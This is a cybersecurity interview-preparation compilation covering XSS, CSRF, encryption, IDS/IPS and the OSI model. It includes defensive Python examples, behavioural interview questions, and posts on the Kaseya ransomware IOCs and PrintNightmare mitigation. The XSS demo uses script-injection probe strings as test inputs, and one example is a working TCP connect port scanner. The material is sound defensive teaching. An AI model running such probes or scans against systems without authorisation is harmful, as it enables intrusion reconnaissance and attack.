•Risk: the combination of how likely a threat is to exploit a vulnerability and the impact or loss if it does. In simple terms, it is the potential damage when a threat meets a vulnerability.

•Risk = threat likelihood × potential loss

Q4) What is Cross-Site Scripting and how can it be prevented?

Ans. Cross-Site Scripting (XSS) is a client-side injection attack: the attacker gets their own script into a web page that other users load, so it runs in the victim's browser with that user's session and can steal cookies or tokens, read page contents, or perform actions as the victim.

The following practices prevent Cross-Site Scripting:

•Output encoding: encode user-supplied data for the context it is inserted into (HTML body, attribute, URL, JavaScript). This is the primary defense.

•Validating user input on the server and rejecting what does not match the expected format.

•Sanitizing any rich HTML you must accept with a maintained allow-list sanitizer rather than a hand-written filter.

•Using a templating framework that escapes by default, adding a Content Security Policy (CSP) as a second layer, and marking session cookies HttpOnly so scripts cannot read them.
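
As an added example (mine, not from the page), here is the same profile fragment rendered by string concatenation and with context-aware encoding, exercised with two constructed probes: a script tag in the display name and an attribute break-out paired with a javascript: URL. The field names and probes are my own choices.

```python
import html
from urllib.parse import urlsplit

# Added example (mine, not from the page). Inputs below are constructed probes.


def render_unsafe(display_name: str, homepage: str) -> str:
    """String concatenation: whatever the user typed lands in the HTML as-is."""
    return (f'<p>Hello {display_name}</p>'
            f'<a href="{homepage}" title="{display_name}">homepage</a>')


def safe_url(url: str) -> str:
    """Only http(s) URLs may go into href; javascript: or data: would run code.
    The surviving URL is still entity-encoded because it sits in an attribute."""
    scheme = urlsplit(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_safe(display_name: str, homepage: str) -> str:
    """Encode per context: text and attribute values get HTML entity encoding
    (quote=True also encodes ' and ", which is what stops attribute break-outs);
    URL attributes get the scheme check on top."""
    name = html.escape(display_name, quote=True)
    return (f'<p>Hello {name}</p>'
            f'<a href="{safe_url(homepage)}" title="{name}">homepage</a>')


if __name__ == "__main__":
    probes = [
        ("<script>alert(document.cookie)</script>", "https://example.com"),
        ('" onmouseover="alert(1)', "javascript:alert(1)"),
    ]
    for name, url in probes:
        print("unsafe:", render_unsafe(name, url))
        print("safe:  ", render_safe(name, url))
```

Note that encoding is per context: the entity encoding that is right for the title attribute would not be enough inside a <script> block or an event handler, which is why templating engines that pick the encoder automatically are preferred over hand-rolled filters.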

Q5) What is the difference between IDS and IPS?

Ans. Intrusion Detection System (IDS): only detects intrusions; it cannot prevent them. It is a monitoring system, and a human or another system has to act on its alerts.

Intrusion Prevention System (IPS): detects and prevents intrusions by sitting inline in the traffic path and blocking what matches. It is a control system. Both need a regularly updated database of the latest threat signatures.

Q6) What is a botnet?

Ans. •A botnet is a group of internet-connected devices (servers, PCs, mobile devices, IoT devices) that have been infected with malware and are controlled remotely by an attacker.

•It is used for stealing data, sending spam, performing distributed denial-of-service (DDoS) attacks and more, and it gives the attacker, not the owner, remote access to each device and its network connection.

Q7) What is a CIA triad?

Ans. CIA (confidentiality, integrity, and availability) triad is a model designed to handle policies for information security within an organization.

Confidentiality - A collection of rules that limits access to information.

Integrity - It assures the information is trustworthy and reliable.

Availability - It provides reliable access to data for authorized people.

Q8) Symmetric vs asymmetric encryption.

Ans. Symmetric encryption uses a single shared key to both encrypt and decrypt. It is fast, so it is preferred for bulk data, but the key has to be delivered to the other party securely first. Algorithms: AES and ChaCha20 (current); DES, 3DES, RC4 and Blowfish are legacy and should not be used in new designs.

Asymmetric encryption uses a key pair: data encrypted with the public key can only be decrypted with the matching private key. It is much slower, so it is mostly used to exchange or wrap symmetric keys and for digital signatures, not for large volumes of data. Algorithms: RSA, Diffie-Hellman (key agreement), and their elliptic-curve forms ECDH and ECDSA/Ed25519.

In practice the two are combined (TLS, PGP): asymmetric cryptography establishes a symmetric session key, which then encrypts the traffic.

Q9) What is the difference between hashing and encryption?

Ans. Both transform readable data into an unreadable form. The difference is direction: encryption is reversible by anyone who holds the key (decryption), while a cryptographic hash is one-way, fixed-length and keyless, so the original cannot be recovered from it. Encryption protects confidentiality; hashing is used for integrity checks, digital signatures and storing passwords, where you only ever need to verify a value, never read it back.

Q10) What is two-factor authentication and how can it be implemented for public websites?

Ans. •Two-factor authentication (2FA, also called dual-factor authentication or two-step verification) requires the user to present two different kinds of authentication factor, typically something they know (the password) plus something they have (a phone, an authenticator app or a hardware key), so a stolen password alone is not enough to log in.

•Public websites such as Twitter, Microsoft and LinkedIn offer 2FA as an extra layer on an account that is already protected by a password; as a user you enable it under the account's security settings.

•To implement it for your own site, the common choices are time-based one-time passwords (TOTP, RFC 6238) generated by an authenticator app, or WebAuthn/FIDO2 hardware keys; SMS codes are the weakest option because of SIM swapping and interception.

Q11) What is the use of a firewall and how can it be implemented?

Ans. A firewall is a security control that inspects and filters network traffic according to a set of rules. It is used to keep unauthorized traffic out of a private network and to limit what can leave it, which also blunts the spread of malware, viruses and worms.

The basic steps to set up and configure a firewall are:

•Change the default administrator password on the firewall device.

•Disable remote administration from the internet, or restrict it to trusted addresses.

•Start from a default-deny inbound policy and only open (port-forward) what specific applications genuinely need, such as an FTP or web server.

•If the network already has a DHCP server, disable the firewall's own DHCP server to avoid conflicts.

•Review the rules regularly and log denied traffic so you can see what is being blocked.

Q12) What is the difference between vulnerability assessment and penetration testing?

Ans. •Vulnerability assessment and penetration testing are different activities, but both serve the essential function of protecting the network environment.

Vulnerability Assessment: a process to define, detect and prioritize vulnerabilities in computer systems, network infrastructure, applications, etc., usually with automated scanners, and to give the organization the information required to fix the flaws. It is broad, repeatable and does not try to exploit anything.

Penetration Testing: also called pen testing or ethical hacking, a process of testing a network, system or application by actually exploiting weaknesses the way an attacker would, chaining them where possible, to show real impact (what data or systems could be reached). It is deeper and narrower than an assessment and is usually done less often.

Q13) What is the difference between stored and reflected XSS?

Ans. •Stored XSS: the injected script is saved on the target server (in a comment, profile field, message, etc.) and served to every user who later views that content, so one injection hits many victims.

•Reflected XSS: the script is carried in the request itself (for example in a URL parameter) and immediately echoed back in the response; it only runs in the browser of the user who sent that request, so the attacker has to get the victim to open a crafted link.

Q14) What is a three-way handshake process?

Ans. The three-way handshake is the procedure TCP (Transmission Control Protocol) uses to establish a reliable connection between a client and a server before any data is transmitted. It is called a three-way handshake because three segments are exchanged between the client and the server.

SYN : The client wants to establish a connection and sends a segment with the SYN (synchronize) flag set, carrying its initial sequence number, to the server.

SYN + ACK : If the server is up and the port is open, it responds with a segment that has both the SYN and ACK flags set, containing its own initial sequence number and acknowledging the client's.

ACK : The client acknowledges the server's response with a segment that has the ACK (acknowledgment) flag set. The connection is now established and data transfer can begin.

Q15) What are HTTP response codes?

Ans. HTTP response (status) codes tell the client whether a particular HTTP request has been completed and, if not, why.

•1xx (Informational) - The request has been received and processing is continuing.

•2xx (Success) - The request was received, understood and accepted (e.g. 200 OK).

•3xx (Redirection) - The client must take further action, usually following a new location, to complete the request (e.g. 301, 302).

•4xx (Client Error) - The request is malformed or cannot be fulfilled for a reason on the client side (e.g. 400, 401, 403, 404).

•5xx (Server Error) - The request appears valid but the server failed to fulfill it (e.g. 500, 502, 503).

Q16) What are the techniques used in preventing a Brute Force Attack?

Ans. A Brute Force Attack is a trial-and-error method of recovering a secret such as a password or an encryption key by systematically trying candidate values until one works, rather than exploiting a weakness in the system. Against a login form it means repeatedly submitting username/password guesses until the right credentials are found.

Brute Force attacks can be mitigated by the following practices:

•Enforce password length and complexity: longer passwords drawn from a larger character set make exhaustive guessing impractical.

•Limit login attempts: lock the account, or add increasing delays, after a set number of failures.

•Two-factor authentication: even a correctly guessed password is not enough on its own.
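The "limit login attempts" control above, as an added example that is not part of the original page: a small login guard that counts failures per account inside a sliding window and locks the account for a fixed period once the limit is reached. The user store, the account name and the thresholds are constructed for the example; passwords are kept only as salted PBKDF2 hashes, and the clock is injectable so the lockout expiry can be exercised without waiting.

```python
import hashlib
import hmac
import os
import time
from collections import defaultdict

MAX_FAILURES = 5         # failed attempts allowed inside the window before lockout
WINDOW_SECONDS = 300     # sliding window over which failures are counted
LOCKOUT_SECONDS = 900    # how long a locked account stays locked
PBKDF2_ROUNDS = 50_000   # assumed work factor; raise it for production


def make_record(password: str):
    """Store a per-user random salt plus a PBKDF2 hash, never the password itself."""
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


# Constructed user store for the example; no real accounts.
USERS = {"alice": make_record("correct horse battery")}
DUMMY_SALT = os.urandom(16)   # so unknown users cost the same time as known ones


class LoginGuard:
    """Counts failed logins per account and refuses further attempts once the limit is hit."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                    # injectable so tests can move time forward
        self.failures = defaultdict(list)     # username -> timestamps of recent failures
        self.locked_until = {}                # username -> time the lockout expires

    def is_locked(self, user: str) -> bool:
        return self.clock() < self.locked_until.get(user, 0.0)

    def attempt(self, user: str, password: str) -> str:
        """Return 'ok', 'denied' or 'locked'."""
        now = self.clock()
        if self.is_locked(user):
            return "locked"                   # do not even check the password
        # Forget failures that have fallen outside the sliding window.
        cutoff = now - WINDOW_SECONDS
        self.failures[user] = [t for t in self.failures[user] if t > cutoff]

        salt, stored = USERS.get(user, (DUMMY_SALT, None))
        candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
        # compare_digest is constant-time, so the comparison does not leak how many bytes matched.
        if stored is not None and hmac.compare_digest(stored, candidate):
            self.failures[user].clear()
            return "ok"

        self.failures[user].append(now)
        if len(self.failures[user]) >= MAX_FAILURES:
            self.locked_until[user] = now + LOCKOUT_SECONDS
            return "locked"
        return "denied"
```

Note that the guard still hashes the password for unknown usernames, so an attacker cannot tell valid from invalid accounts by response time, and that a locked account rejects even the correct password until the lockout expires. Per-account lockout can be turned into a denial-of-service against users, so production systems usually combine it with per-IP rate limiting and progressive delays rather than hard lockouts alone.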

Q17) List the common types of cybersecurity attacks.

Ans. The following are the most common types of cybersecurity attacks:

•Malware  •SQL Injection Attack •Cross-Site Scripting (XSS) •Denial-of-Service (DoS)

•Man-in-the-Middle Attacks •Credential Reuse •Phishing •Session Hijacking

Q18) Define data leakage and its types?

Ans. Data Leakage refers to the unauthorized transmission of data from inside an organization to an external destination or recipient. It can take place physically or electronically, and usually occurs via the web, email and mobile data storage devices.

Types of data leakage:

1. The Accidental Breach - The majority of data leakage incidents are accidental.

Ex: An employee picks the wrong recipient while sending confidential data.

2. The Disgruntled or Ill-intentioned Employee - An authorized user deliberately sends confidential data to an unauthorized party.

3. Electronic Communications with Malicious Intent - Almost every electronic medium (email, instant messaging, cloud storage, removable media) can transfer files and reach external destinations over the internet, which gives malware and malicious insiders many channels through which to leak data.

Q19) What is the use of Traceroute?

Ans. Traceroute is a network diagnostic tool used to track the path packets take across an IP network from source to destination. It sends probes with increasing TTL values so that each router along the route reveals itself, and it records the round-trip time to each hop.

Q20) How to prevent CSRF attacks?

Ans. CSRF (Cross-Site Request Forgery) is an attack in which an attacker tricks a victim's browser into sending a request to a site where the victim is already authenticated, so that the site performs an action (a transfer, a password change) on the attacker's behalf using the victim's session cookie.

CSRF attacks can be prevented by the following measures:

•On the application side, include an unpredictable anti-CSRF token in every state-changing form or request, and reject requests whose token is missing or does not match the session.

•Set the SameSite attribute on session cookies, verify the Origin or Referer header on sensitive requests, and require re-authentication for high-value actions.

•While authenticated to a banking site or performing financial transactions on any other website, do not browse other sites or open emails, since a malicious page can silently submit requests using your active session; log out when you are done.

•Never save your login/password within your browser for financial sites.

Q21) What is port scanning?

Ans. Port scanning is the technique (and the class of tools) used to discover which ports on a host are open and which services are listening on them. Security administrators use it to audit their own networks and find unexpected exposure; attackers use it to map targets before exploiting them.

Some of the most popular port scanning techniques are listed below:

•Ping scan  •TCP connect •TCP half-open •Stealth scanning – NULL, FIN, X-MAS •UDP
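The TCP connect technique from the list above, as an added example that is not part of the original page: a scanner that performs a full three-way handshake against each port and classifies the result as open, closed or filtered. To stay self-contained and offline it opens its own listening socket on loopback to stand in for a real service; scanning hosts you do not own or have permission to test is not acceptable.

```python
import errno
import socket


def start_listener(host: str = "127.0.0.1"):
    """Open a listening TCP socket on an OS-chosen port; it stands in for a real service.
    No accept() is needed: the kernel completes the handshake into the listen backlog."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def tcp_connect_scan(host: str, ports, timeout: float = 0.5):
    """TCP connect scan: attempt a full three-way handshake with each port.
    Returns a dict of port -> 'open' | 'closed' | 'filtered'."""
    results = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            err = s.connect_ex((host, port))      # errno instead of an exception
            if err == 0:
                results[port] = "open"            # SYN/ACK came back: something is listening
            elif err == errno.ECONNREFUSED:
                results[port] = "closed"          # RST came back: nothing listening
            else:
                results[port] = "filtered"        # timeout or other error: probably dropped by a firewall
    return results


def open_ports(host: str, ports, timeout: float = 0.5):
    """Convenience wrapper returning just the open ports, sorted."""
    return sorted(p for p, state in tcp_connect_scan(host, ports, timeout).items() if state == "open")
```

Because the handshake completes, a connect scan is logged by the target service and shows up as a normal connection; the half-open (SYN) and NULL/FIN/XMAS variants in the list above avoid that by never finishing the handshake, but they need raw sockets and therefore root.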


Q22) What is the need for DNS monitoring?

Ans.

•DNS (Domain Name System) is the service that converts user-friendly domain names into the IP addresses computers use, so that a website can be reached under a name that is easy to remember.

•DNS monitoring means watching DNS records and query traffic to make sure they still route users correctly to your website, email and other services, and to catch tampering (hijacked records, unexpected resolvers) or abuse (malware calling home or tunnelling data out through DNS queries).

Q23) What is the difference between hashing and salting?

Ans.

•Hashing is a one-way function that maps data of any length to a fixed-length value; it is widely used for storing passwords, because the original value cannot be recovered from the hash.

•Salting is an extra step added to hashing: a random value (the salt) is generated for each password and combined with it before hashing, so two users with the same password get different hashes and precomputed rainbow tables become useless. The salt is stored alongside the hash, since it is needed again to verify the password.

Q24) How to prevent ‘Man-in-the-Middle Attack’?

Ans. The following practices help prevent 'Man-in-the-Middle Attacks':

•Use strong encryption on wireless access points (WPA2 or WPA3). WEP is broken and should never be used, because it lets an attacker join the network and intercept traffic.

•Use a VPN to protect sensitive traffic on untrusted networks; it encrypts the whole connection with keys negotiated between the client and the VPN server.

•Use public-key based authentication at the various layers of the stack (TLS certificates, SSH host keys) so you can verify that you are really talking to the intended party and not to someone in the middle.

•Use HTTPS, so that HTTP traffic is protected by TLS: the server proves its identity with a certificate and the session keys are established through a public-key exchange.

Q25) What are the common methods of authentication for network security?

Ans.

•Biometrics - Known and registered physical attributes of a user (fingerprint, face, iris) used to verify their identity.

•Token - A physical or software token that generates or holds a credential used to access systems. It makes it harder for attackers to get into accounts, since the token's secret is long and is not something the user types or can be phished as easily as a password.

•Transaction Authentication - A one-time PIN or password is required to complete an online transaction, so that the user's identity is verified for that specific operation.

•Multi-Factor Authentication - A security mechanism that requires more than one method of authentication (something you know, something you have, something you are).

•Out-of-Band Authentication - Authentication that requires two different signals from two separate channels or networks, for example a web login confirmed by a code sent to a phone. It defeats many credential-theft and identity-fraud attacks in online banking, because compromising one channel is not enough.

Q26) Which is more secure SSL or HTTPS?

Ans.

•SSL (Secure Sockets Layer) is a protocol that provides an encrypted, authenticated channel between two parties across the internet. It sits between the application protocol (such as HTTP) and TCP. Its modern successor is TLS (Transport Layer Security); all SSL versions are now deprecated as insecure.

•HTTPS (Hypertext Transfer Protocol Secure) is simply HTTP carried over SSL/TLS, which gives browsing confidentiality, integrity and server authentication.

•The comparison is therefore misleading: HTTPS is not an alternative to SSL but an application of it. What matters for security is the protocol version and configuration underneath, so HTTPS should be served over TLS 1.2 or 1.3, not over SSL.

Q27) What is the difference between black hat, white hat, and grey hat hackers?

Ans.•A Black-hat hacker is a person who tries to gain unauthorized access to a system or network to steal information or cause damage for malicious purposes.

•White-hat hackers are also known as ethical hackers; they are well versed in hacking tools, methodologies and tactics and use them, with permission, to secure organizations' data. They try to detect and fix vulnerabilities and security holes in systems before attackers find them. Many top companies recruit white-hat hackers.

•A Grey-hat hacker is a computer security expert who may sometimes violate ethical standards or laws, for example by probing systems without permission, but does not have the malicious intent of a black-hat hacker.

Q28) What is cognitive security?

Ans. Cognitive security is an application of AI technologies, modelled on human reasoning processes, that is used to identify threats and protect physical and digital systems.

Such self-learning security systems use pattern recognition, natural language processing and data mining to mimic the way a human analyst works.

Q29) What is phishing and how it can be prevented?

Ans. Phishing is a malicious attempt to impersonate a trusted entity in electronic communication in order to obtain sensitive information such as usernames, passwords and card details through fraudulent messages and emails.

The following practices help prevent phishing:

•Use firewalls and web filtering on your networks and systems.

•Enable robust antivirus protection that includes internet security features.

•Use two-factor authentication wherever possible.

•Keep systems, browsers and email clients patched and up to date.

•Don't enter sensitive information such as financial or transaction details on web pages you don't trust; check the address bar before you type.

•Keep yourself informed about the latest phishing techniques, and report suspicious messages.

Q30) What is SQL injection and how it can be prevented?

Ans. SQL Injection (SQLi) is a type of code injection attack where it manages to execute malicious SQL statements to control a database server behind a web application. Attackers mostly use this to avoid application security measures and thereby access, modify, and delete unauthorized data.

The following ways will help you to mitigate or prevent SQL injection attacks:

•Include Prepared Statements (with Parameterized Queries)

•Use Stored Procedures

•Validate user input

•Hide data from the error message

•Update your system

•Store database credentials separate and encrypted

•Disable shell and any other functionalities you don’t need

 

Q31) How will you keep yourself updated with the latest cybersecurity news?

Ans. The following ways will help you to keep up with the latest cybersecurity updates:

•Follow news websites and blogs from security experts.

•Browse security-related social media topics.

•Check vulnerability alert feeds and advisory sites.

•Attend cybersecurity live events.

 

Q32) What is a DDOS attack and how to stop and prevent them?

Ans. A DDoS (distributed denial-of-service) attack is a malicious attempt to disrupt the normal traffic of a network or server by flooding it with a large volume of requests, making it unavailable to legitimate users. The requests come from many compromised sources (a botnet) rather than a single machine, hence distributed denial of service.

The following methods will help you to stop and prevent DDOS attacks:

•Build a denial of service response plan

•Protect your network infrastructure

•Employ basic network security

•Maintain strong network architecture

•Understand the Warning Signs

•Consider DDoS as a service

 

Q33) What do you understand by compliance in Cybersecurity?

Ans.

•Compliance means living by a set of standards set by an organization, a government or an independent party.

•It helps in defining and achieving IT targets and also in mitigating threats through processes like vulnerability management.

 

Q34) What is the use of Patch Management?

Ans.

•The purpose of patch management is to keep the various systems in a network up to date and protected against malware and hacking attacks that exploit known vulnerabilities.

•Many enterprise patch management tools manage the patching process by installing or deploying agents on the target computers; the agents provide the link between a centralized patch server and the computers to be patched.

Q35) What is the difference between a false positive and false negative in IDS?

Ans.

•A false positive is a false alarm; a false negative is the more serious condition, because it means an attack went unnoticed.

•A false positive occurs when an IDS raises an alert for legitimate network activity.

•A false negative occurs when an IDS fails to identify malicious network traffic.

Of the two, a false positive is more acceptable than a false negative, because false negatives let intrusions happen without anyone noticing (although too many false positives cause alert fatigue, and then real alerts get ignored too).

Q36) what is the difference between the Red team and Blue team?

Ans.

•Red team and blue team are terms borrowed from military exercises. Many organizations split their security team into these two groups.

•The red team plays the attacker: it emulates real adversaries to find and exploit weaknesses in the organization's security.

•The blue team plays the defender: it detects and responds to the red team's activity and fixes the vulnerabilities found before they can lead to a real breach.

Q37) Explain System hardening?

Ans.

•Generally, system hardening refers to a combination of tools and techniques for reducing vulnerabilities in an organization's systems, applications, firmware and more.

•The purpose of system hardening is to lower security risk by removing unnecessary services, accounts and features, thereby reducing the number of possible attacks and shrinking the system's attack surface.

The following are the various types of system hardening:

1.Database hardening

2.Operating system hardening

3.Application hardening

4.Server hardening

5.Network hardening

Q38) What is a cybersecurity risk assessment?

Ans. A cybersecurity risk assessment identifies the information assets that could be affected by a cyber attack (including customer data, hardware, laptops, etc.) and evaluates the various risks that could affect those assets.

It is mostly performed to identify, evaluate, and prioritize risks across organizations.

The best way to perform a cybersecurity risk assessment is to identify:

•The threats relevant to your organization

•Internal and external vulnerabilities

•The impact if those vulnerabilities are exploited, and the likelihood that they will be

Q39) What are the seven layers of the OSI model?

Ans. The OSI model describes, in seven layers, how communication between two endpoints in a network is processed.

The seven Open Systems Interconnection layers are listed below:

Application layer (layer 7) - Provides the interface through which users and applications access network services (HTTP, SMTP, DNS).

Presentation layer (layer 6) - Translates data into the format the application layer expects: character encoding, compression, and encryption/decryption.

Session layer (layer 5) - Establishes, maintains and terminates sessions between applications, including how long a system waits for the other side to respond.

Transport layer (layer 4) - Delivers data end to end across the network and provides error checking and flow control (TCP, UDP).

Network layer (layer 3) - Addresses and routes packets from one network to another (IP).

Data-link layer (layer 2) - Handles the flow of frames between directly connected nodes on a network and deals with errors caused by bit transmission problems (Ethernet, MAC addresses).

Physical layer (layer 1) - Transfers the raw bits from one device to another over the medium. It also defines how physical connections are set up and how bits are represented as signals, whether optical, electrical or radio waves.

Q40) What are the several indicators of compromise(IOC) that organizations should monitor?

Ans. The key indicators of compromise that organizations should monitor are listed below:

•Unusual Outbound Network Traffic  •HTML Response Sizes

•Geographical Irregularities •Increases in Database Read Volume

•Log-In Red Flags •Unexpected Patching of Systems

•Large Numbers of Requests for the Same File •Web Traffic with Unhuman Behavior

•Suspicious Registry or System File Changes •Unusual DNS Requests

•Mobile Device Profile Changes •Bundles of Data in the Wrong Place

•Mismatched Port-Application Traffic •Signs of DDoS Activity

•Anomalies in Privileged User Account Activity
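The "Unusual DNS Requests" indicator from the list above, turned into detection logic as an added example that is not part of the original page. It runs over a handful of constructed DNS query log lines (timestamp, client, query type, name) and flags two patterns typical of DNS tunnelling or command-and-control: leftmost labels that are long and high-entropy, and a single base domain receiving an unusual number of distinct subdomains. The thresholds and the log format are assumptions; tune them to your resolver's logs.

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log, one record per line: <timestamp> <client> <qtype> <name>
SAMPLE_LOG = """\
2021-07-04T10:00:01 10.0.0.5 A www.example.com
2021-07-04T10:00:02 10.0.0.5 A mail.example.com
2021-07-04T10:00:03 10.0.0.7 TXT 6a7b9c0d1e2f3a4b5c6d7e8f90a1b2c3.tunnel.example
2021-07-04T10:00:04 10.0.0.7 TXT 3f2e1d0c9b8a7f6e5d4c3b2a19081726.tunnel.example
2021-07-04T10:00:05 10.0.0.7 TXT 9d8c7b6a5f4e3d2c1b0a9f8e7d6c5b4a.tunnel.example
2021-07-04T10:00:06 10.0.0.7 A 5c4b3a2f1e0d9c8b7a6f5e4d3c2b1a09.tunnel.example
2021-07-04T10:00:07 10.0.0.9 A cdn.example.net
"""


def shannon_entropy(s: str) -> float:
    """Bits of entropy per character; encoded/encrypted data scores high, real words low."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(name: str) -> str:
    """Crude registrable-domain extraction: the last two labels (assumption; no public-suffix list)."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def parse(log_text: str):
    records = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, name = line.split()
        records.append({"ts": ts, "client": client, "qtype": qtype, "name": name.lower()})
    return records


def find_suspicious_dns(records, entropy_threshold=3.5, label_len=24, max_unique_subs=3):
    """Return a list of (reason, value) findings.
    - high-entropy-label: a leftmost label that is both long and random-looking
    - many-unique-subdomains: one base domain queried with more distinct names than expected"""
    findings = []
    subs = defaultdict(set)
    for r in records:
        first = r["name"].split(".")[0]
        if len(first) >= label_len and shannon_entropy(first) >= entropy_threshold:
            findings.append(("high-entropy-label", r["name"]))
        subs[base_domain(r["name"])].add(r["name"])
    for dom, names in subs.items():
        if len(names) > max_unique_subs:
            findings.append(("many-unique-subdomains", dom))
    return findings
```

On real traffic, content delivery networks and some cloud services also produce long random-looking hostnames, so a production rule would whitelist known base domains and look at the volume and query types (TXT, NULL) per client as well.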




EXAMPLE BEHAVIOURAL INTERVIEW QUESTIONS

Below is a list of commonly asked behavioural interview questions which highlight specific competencies and behavioural traits in the workplace. 

Initiative

• Tell me about any ideas or processes that you have implemented in your current job.

• Have you ever suggested a new way to improve your team/project’s performance? 

Problem Solving

• Tell me about a complex problem you have solved. Walk me through the process you took.

• Tell me about a potential problem you have prevented from occurring.

Leadership Skills

• How do you go about allocating work for your staff? Can you give me an example?

• Tell me about a time when you have provided coaching to one of your staff.

• Tell me about a time when you have had staff members resist your leadership. What did you do to overcome this?

Decision Making

• Tell me about a recent decision you have made in your role. Walk me through your thought processes.

• What is the most difficult decision you have made in your current role? 

Team Skills

• Tell me about a time when you had to work with a team of people you did not know.

• Tell me about a specific situation where you were able to help out a team member or colleague.

Project Management

• Tell me about a project you have managed recently. Walk me through your planning and tracking process.

• Tell me about a project you managed that didn’t go to plan.

Analysis Skills

• Tell me about a project where you were asked to gather and evaluate complex information.

• Tell me about a time when you were asked to make a recommendation based on statistical information.

Time Management

• Tell me about a specific situation when you managed conflicting priorities. What did you do?

• Tell me about a time when the project you were working on seemed in danger of missing a deadline. What did you do?

Building Rapport

• Tell me about a time when you have had to deal with a difficult customer/colleague. What happened? What was difficult about them?

Quick Learner

• Tell me about a time in your current role when you had to learn new skills quickly.

Negotiation Skills

• Tell me about a difficult negotiation that you had to handle.

Kaseya VSA Supply-Chain Ransomware Attack

After #printnightmare, another high alert for the security community and administrators. No weekends or holidays in #cybersecurity.

#Kaseya VSA Supply-Chain #Ransomware Attack: the ransomware group REvil is exploiting vulnerable instances of Kaseya VSA globally.

Kaseya VSA is a platform that provides endpoint management and network monitoring. Anyone who is currently running #Kaseya software, or whose MSP runs it, has potentially been compromised!

Once inside the supplier's system, the attackers use it as a jumping-off point into its customers' networks too. Then they deploy ransomware, which encrypts the victims' data and only releases it once a ransom payment has been made.

Organisations are recommended to follow the advice provided by Kaseya and immediately #shutdown their on-premises Kaseya VSA server until further notice.

So far around 200 US companies are affected, and one of Sweden's biggest grocery chains closed all of its 800 stores today after this attack because it was unable to operate its cash registers.

Technical Details: Kaseya supply chain attack Indicators of Compromise (IOCs)

HASHES (SHA256)

d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e

e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2

8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd

More info available here: https://lnkd.in/gJ5hfD2
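How a threat hunter would actually use the hashes above, as an added example that is not part of the original post: a sweep that streams every file under a directory through SHA256 and reports matches against the IOC set. The demo() helper builds a throwaway directory with a constructed "suspect" file whose hash is added to the watch list, since no real sample is shipped with the example; the three Kaseya hashes are the ones listed above.

```python
import hashlib
import tempfile
from pathlib import Path

# SHA256 IOCs published for the Kaseya VSA incident, as listed above.
KASEYA_IOCS = {
    "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e",
    "e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2",
    "8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size: int = 1 << 20) -> str:
    """Stream the file in chunks so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def sweep(root, iocs=KASEYA_IOCS):
    """Walk a directory tree; return [(path, sha256)] for files whose hash is a known IOC."""
    hits = []
    for p in Path(root).rglob("*"):
        if p.is_file():
            digest = sha256_file(p)
            if digest.lower() in iocs:
                hits.append((str(p), digest))
    return hits


def demo():
    """Constructed demonstration: one benign file and one whose hash we add to the watch list."""
    root = Path(tempfile.mkdtemp())
    (root / "readme.txt").write_bytes(b"nothing to see here")
    suspect = root / "suspect.bin"
    suspect.write_bytes(b"constructed stand-in for a malicious payload")
    marker_hash = sha256_hex(suspect.read_bytes())
    hits = sweep(root, iocs=KASEYA_IOCS | {marker_hash})
    return hits, marker_hash
```

Hash matching only catches the exact files that were published; attackers recompile, so a sweep like this confirms known compromise but does not prove its absence. Pair it with the behavioural indicators (unexpected agent.exe drops, Defender being disabled) from the vendor advisory.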

Someone rightly said: cybercriminals are awful for a whole bunch of reasons, but especially for ruining long weekends and holidays for IT professionals over and over again. Be nice to your IT team. They are the ones working through the nights and weekends to protect you from this scum.

#ThreatHunting #IOC #REvil #KaseyaVSA #KaseyaHacked #MSP

Print Spooler vulnerability PrintNightmare

A remote code execution vulnerability exists when the Windows Print Spooler service improperly performs privileged file operations.

An attacker who successfully exploits this vulnerability can run arbitrary code with SYSTEM privileges. The attacker could then install programs; view, change or delete data; or create new accounts with full user rights.

Because of this exposure, domain controllers and Active Directory admin systems should have the #Print #Spooler service disabled. Do it now and protect yourself from the Print Spooler vulnerability CVE-2021-34527 #printnightmare.

See the flowchart to determine whether you need to disable the Print Spooler now.


If disabling the Print Spooler service is appropriate for your organisation, you can do it in the following ways.

1. The recommended way is a Group Policy Object:

Computer Configuration > Administrative Templates > Printers

Set the "Allow Print Spooler to accept client connections:" policy to Disabled to block remote attacks (the spooler keeps running for local printing but no longer accepts inbound connections).

2. You can also use the following PowerShell commands, which stop the service and prevent it from starting again:

 Stop-Service -Name Spooler -Force 

 Set-Service -Name Spooler -StartupType Disabled

 Good Luck. 

 #windows #printer #printnightmare


Windows 11 is here. All the new features and exciting things to come.

Windows 11 is here. From the official release that details the new features of Windows 11:

Windows 11 is also secure by design, with new built-in security technologies that add protection from the chip to the cloud, while enabling productivity and new experiences. Windows 11 provides a Zero Trust-ready operating system to protect data and access across devices.

Microsoft has worked closely with OEM and silicon partners to raise the security baseline (TPM 2.0 and Secure Boot are now requirements) to meet the needs of the evolving threat landscape and the new hybrid work world.

 


